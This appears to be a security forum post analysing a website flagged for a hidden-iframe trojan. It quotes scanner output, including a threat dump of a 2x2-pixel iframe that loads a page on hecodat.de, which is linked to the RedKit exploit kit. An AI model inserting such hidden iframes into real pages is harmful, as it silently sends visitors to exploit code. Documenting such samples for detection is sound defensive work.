Url with a malware variant of JS/Iframe.HH trojan or dead?

Quttera flags: Suspicious files: 1

Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to ‘hecodat.de
Offset: 3615
Threat dump: [[<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=htxp://hecodat.de/zwmd.html?i=994814>]]
File size[byte]: 3900
File type: ASCII
MD5: E4B6D27BE82BA8BDBE284F2A8B0EB222
Scan duration[sec]: 0.003000

See: https://www.virustotal.com/nl/url/d747fa58a05ebd2143098a9e3c1285de81ddb2829189efd353f5450ec236978e/analysis/
Bitdefender TraffcLight flags the iFrame src as malicious → detected as RedKit exploit kit URL pattern
here: http://urlquery.net/report.php?id=3447957 dead because: HTTP/1.1 404 Not Found Content-Type: text/html

polonus

Check on the threatdump via HackerNinja produced:
Checking hecodat.de/zwmd.html?i=994814>
close
Bing Test
PASSED
AntiVirus Scan
PASSED
Google bot Test
PASSED
Scan for Hostile Strings
**Risk Identified
Generic Web Bot test
**Risk Identified
Google Malware List
PASSED

Site’s web history has had blacklisted periods: https://www.google.com/safebrowsing/diagnostic?site=hecodat.de

polonus